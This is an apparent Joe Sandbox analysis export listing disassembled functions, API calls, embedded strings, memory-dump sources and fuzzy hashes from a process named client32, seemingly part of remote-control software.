Function 68C6AEA0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 68C77D00: __vswprintf.LIBCMT ref: 68C77D26

Part of subcall function 68C65060: _free.LIBCMT ref: 68C6506A
Part of subcall function 68C65060: _malloc.LIBCMT ref: 68C65090

_free.LIBCMT ref: 68C6AF0A

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

_free.LIBCMT ref: 68C6AF39

Part of subcall function 68C77B60: _sprintf.LIBCMT ref: 68C77B77

Part of subcall function 68C777E0: _free.LIBCMT ref: 68C777EF

Strings

USERNAME=%s, xrefs: 68C6AEFE
CMD=STATUS, xrefs: 68C6AEC0
REQUESTING_HELP=%d, xrefs: 68C6AED6
CHANNEL=%s, xrefs: 68C6AF2D

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast__vswprintf_malloc_sprintf
String ID: CHANNEL=%s$CMD=STATUS$REQUESTING_HELP=%d$USERNAME=%s
API String ID: 1628406020-2994292602
Opcode ID: 88880a1472629b1e2370227c452fd5f751c46e7b5d015b136efa77eb53bd6c26
Instruction ID: f2cbfee63ae44561d21c6e54cf747de7d39419506bc8a6d52a310dd92f92ccee
Opcode Fuzzy Hash: 88880a1472629b1e2370227c452fd5f751c46e7b5d015b136efa77eb53bd6c26
Instruction Fuzzy Hash: 29217CBA90010CBACB11DBE8CC85FFF7BBCDB54708F904159A602A7140FB34AA4597E5

Function 68C87A09 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 68C87960

Part of subcall function 68C8F4BC: __mtinitlocknum.LIBCMT ref: 68C8F4D2
Part of subcall function 68C8F4BC: __amsg_exit.LIBCMT ref: 68C8F4DE
Part of subcall function 68C8F4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,68C86E81,0000000D), ref: 68C8F4E6

InterlockedDecrement.KERNEL32(00000000), ref: 68C87972
_free.LIBCMT ref: 68C87987

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

__lock.LIBCMT ref: 68C879A0
___removelocaleref.LIBCMT ref: 68C879AF
___freetlocinfo.LIBCMT ref: 68C879C8
_free.LIBCMT ref: 68C879E5

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 556454624-0
Opcode ID: 3d2504202f8a2b2f55acebccedadfef7b54faba28ea23f0ad2f621537d1ed4a4
Instruction ID: 24544aa1bfd13ff50849a7511f400c5ecde585358093d165f2d371b4202e8875
Opcode Fuzzy Hash: 3d2504202f8a2b2f55acebccedadfef7b54faba28ea23f0ad2f621537d1ed4a4
Instruction Fuzzy Hash: B31191F56817049ADB205F689544B6E7BF8AF4072CFA04519E4B5E71D0FB74C940E690

Function 1101D350 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D35E
LoadIconA.USER32(00000000,0000139A), ref: 1101D3AF
LoadCursorA.USER32(00000000,00007F00), ref: 1101D3BF
RegisterClassExA.USER32(00000030), ref: 1101D3E1
GetLastError.KERNEL32 ref: 1101D3E7

Strings

0, xrefs: 1101D36C

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$ClassCursorErrorIconLastRegister_memset
String ID: 0
API String ID: 430917334-4108050209
Opcode ID: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
Instruction ID: 2890e39c8948161dcf3a4c2706354c0f925fee5346d150246dd1548a136c71b7
Opcode Fuzzy Hash: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
Instruction Fuzzy Hash: D0018074D0131AABDB00EFE0C859B9DFBB4AB04308F508529F614BA284E7B511048B96

Function 68C86E37 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,68CA72D8,00000008,68C86F3F,00000000,00000000), ref: 68C86E48
__lock.LIBCMT ref: 68C86E7C

Part of subcall function 68C8F4BC: __mtinitlocknum.LIBCMT ref: 68C8F4D2
Part of subcall function 68C8F4BC: __amsg_exit.LIBCMT ref: 68C8F4DE
Part of subcall function 68C8F4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,68C86E81,0000000D), ref: 68C8F4E6

InterlockedIncrement.KERNEL32(?), ref: 68C86E89
__lock.LIBCMT ref: 68C86E9D
___addlocaleref.LIBCMT ref: 68C86EBB

Strings

KERNEL32.DLL, xrefs: 68C86E43

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: c6bcc8d900bfe0ad1a2e54581f5fd3302158e5945c77dd5fd83ea290e5c0a259
Instruction ID: b54dd8ea5cc1dfc86bb8e21fb8412d8bcc141dbe91fcf91cc841051409b5b048
Opcode Fuzzy Hash: c6bcc8d900bfe0ad1a2e54581f5fd3302158e5945c77dd5fd83ea290e5c0a259
Instruction Fuzzy Hash: F3015EB5490B01EFDB208F69C40575EBFF0AF51328F50890EE5D6A77A0EB74A540CB10

Function 11003340 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFD), ref: 1100334D
GetSubMenu.USER32(00000000,00000000), ref: 11003373
DestroyMenu.USER32(00000000), ref: 110033A2

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\CTL32\annotate.cpp, xrefs: 1100335E, 11003384
hSub, xrefs: 11003389
hMenu, xrefs: 11003363

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
Instruction ID: 58cfccb6135285d2752e7502dd052a47240bf2dd06342519f2e5277968a08211
Opcode Fuzzy Hash: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
Instruction Fuzzy Hash: 79F05C3EF0062663C22352263C49F4FB7684BC1AB8F110071F910FA744FE11A00041FA

Function 68C8A1B3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 68C8A1D4

Part of subcall function 68C86F64: __getptd_noexit.LIBCMT ref: 68C86F67
Part of subcall function 68C86F64: __amsg_exit.LIBCMT ref: 68C86F74

__getptd.LIBCMT ref: 68C8A1E5
__getptd.LIBCMT ref: 68C8A1F3

Strings

MOC, xrefs: 68C8A1C6
csm, xrefs: 68C8A1CD
RCC, xrefs: 68C8A1BF

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 33004280def899aedbdd59ab7d35921a2397866726736b24204f4e0db693ef8a
Instruction ID: 64e0642bea511399d53e3b227f0719a5da43c29a551dd92f59664f238457111f
Opcode Fuzzy Hash: 33004280def899aedbdd59ab7d35921a2397866726736b24204f4e0db693ef8a
Instruction Fuzzy Hash: 3FE01AB4594704DEC700AB68C049B683AA4BB8821CFD591A2D52CCB2A2F728E9918A43

Function 68C87A14 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 68C87A20

Part of subcall function 68C86F64: __getptd_noexit.LIBCMT ref: 68C86F67
Part of subcall function 68C86F64: __amsg_exit.LIBCMT ref: 68C86F74

__calloc_crt.LIBCMT ref: 68C87A2B

Part of subcall function 68C8D3F5: Sleep.KERNEL32(00000000,68C86F16,00000001,00000214), ref: 68C8D41D

__lock.LIBCMT ref: 68C87A61
___addlocaleref.LIBCMT ref: 68C87A6D
__lock.LIBCMT ref: 68C87A81
InterlockedIncrement.KERNEL32(?), ref: 68C87A91

Part of subcall function 68C860F9: __getptd_noexit.LIBCMT ref: 68C860F9

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
String ID:
API String ID: 3803058747-0
Opcode ID: 8e56933570fd21cb0218992c2e93ef3ed2591a1b64d4152cbc9f7e356a9ca5bd
Instruction ID: 4eb6ebfbe1a9baf1f0d3110f3c6991a22d30dcc7ce3bcb28149f26ef2407e61a
Opcode Fuzzy Hash: 8e56933570fd21cb0218992c2e93ef3ed2591a1b64d4152cbc9f7e356a9ca5bd
Instruction Fuzzy Hash: ED01F1BA2D0700EEEB10AFB4D904B6CBFB0AF4072CFA0C10AE644972C0FB7189009B11

Function 68C668D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(68CAB898,?,68C73061,?), ref: 68C669EB
_free.LIBCMT ref: 68C66A07
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C66A1B

Strings

LICENSE, xrefs: 68C66915
FAILED_REASON, xrefs: 68C668F7

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave_free
String ID: FAILED_REASON$LICENSE
API String ID: 2208350527-1913596546
Opcode ID: 4c753ecb67cf74bcdb549e33ae33ed4c3a9c468712d4428ad9c20ab5c733afe3
Instruction ID: 29b44740d5a80023d898ab468b5e98ea9cd02915e4120896fb4c2eb79a7108f5
Opcode Fuzzy Hash: 4c753ecb67cf74bcdb549e33ae33ed4c3a9c468712d4428ad9c20ab5c733afe3
Instruction Fuzzy Hash: 16416B72904907EBDB014E789894AAFBBF59F42369F844174DD9597300FB31D98AC3D0

Function 11063020 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 11063183

Strings

Processed EV_CALLED_CONTROL s=%d, addr=%s, xrefs: 11063163
CalledControl connectCB (ConnectToClient), xrefs: 110630A3
Processing EV_CALLED_CONTROL s=%d, addr=%s, xtra=%s..., xrefs: 1106307A
CalledControl queuing connectCB, xrefs: 110630DE

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID: CalledControl connectCB (ConnectToClient)$CalledControl queuing connectCB$Processed EV_CALLED_CONTROL s=%d, addr=%s$Processing EV_CALLED_CONTROL s=%d, addr=%s, xtra=%s...
API String ID: 269201875-3945191877
Opcode ID: 44257373016d6b8418fc1a946c7e2e193fc670ea2de3aeb999e62380cf9b68a1
Instruction ID: ad4fc64b1b45b22dc8976a722efc95f76693d688fd9bacd6ae6debcedb9fc040
Opcode Fuzzy Hash: 44257373016d6b8418fc1a946c7e2e193fc670ea2de3aeb999e62380cf9b68a1
Instruction Fuzzy Hash: D44161B5A04A05AFD724CBA4DC40B66F7F9FF44718F10865AE96987680E770B840CBA1

Function 68C62E50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

%s: , xrefs: 68C62EFA
HTCTL32, xrefs: 68C62E90, 68C62EEF

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: HandleModule
String ID: %s: $HTCTL32
API String ID: 4139908857-3797952780
Opcode ID: 7ad5ac8fd0a8323f29250fe8156b744c5901b0d689571d0d43663483398a50b5
Instruction ID: 8b5d671b934405672a442acb317d02eebaf435b28b2fe016466c3ac2a7a99586
Opcode Fuzzy Hash: 7ad5ac8fd0a8323f29250fe8156b744c5901b0d689571d0d43663483398a50b5
Instruction Fuzzy Hash: DD41D935900119DFCB10CF68DC68AEE7BB4EF4A319F5086A5E86997140FB31D64ACF91

Function 110331B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 110331C4
_strncpy.LIBCMT ref: 11033204
wsprintfA.USER32 ref: 11033272
_strncpy.LIBCMT ref: 110332CA

Strings

%s (%s), xrefs: 11033269

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy$wsprintf
String ID: %s (%s)
API String ID: 2895084632-1363028141
Opcode ID: 236e2de8c27c3f51a7e19888ab6a09b8fc4401359bc5b798424c8777141cb494
Instruction ID: 6d4a293539ff99ff9d91cd4089b7baa119477a06ea1ce5901e9509b66a7a6bff
Opcode Fuzzy Hash: 236e2de8c27c3f51a7e19888ab6a09b8fc4401359bc5b798424c8777141cb494
Instruction Fuzzy Hash: 4731F374E143469FEB11CF24DCC4BA7BBE8AF85309F004968E9458B382E7B4E514CBA1

Function 110EB160 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,77074C70), ref: 110EB1B1
_free.LIBCMT ref: 110EB1CC

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110EB20A
_free.LIBCMT ref: 110EB293

Strings

Error %d getting %s, xrefs: 110EB24D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_free$ErrorFreeHeapLast
String ID: Error %d getting %s
API String ID: 3888477750-2709163689
Opcode ID: 92455008d62525dafcdf8e23666724c203daf775c03ee8a075b6d364e35e82c3
Instruction ID: 4c35e499aaf5ad9a009ae928ade364ef1dd2f983720d507f3f6301ea2f5437f7
Opcode Fuzzy Hash: 92455008d62525dafcdf8e23666724c203daf775c03ee8a075b6d364e35e82c3
Instruction Fuzzy Hash: FA316175D001299FDB90DA55CC84BAEB7F9AF45304F05C0E9E959A7240DE306E85CFE1

Function 1106D168 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
wsprintfA.USER32 ref: 1106D299
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 1106D2BF

Part of subcall function 11139BB0: std::_Xinvalid_argument.LIBCPMT ref: 11139BCA

Part of subcall function 1110C8A0: EnterCriticalSection.KERNEL32(?,62C07B5E,?,?,?,?,?,?), ref: 1110C8D4
Part of subcall function 1110C8A0: LeaveCriticalSection.KERNEL32(?,?,?), ref: 1110C911

Strings

..\ctl32\Connect.cpp, xrefs: 1106D2AA
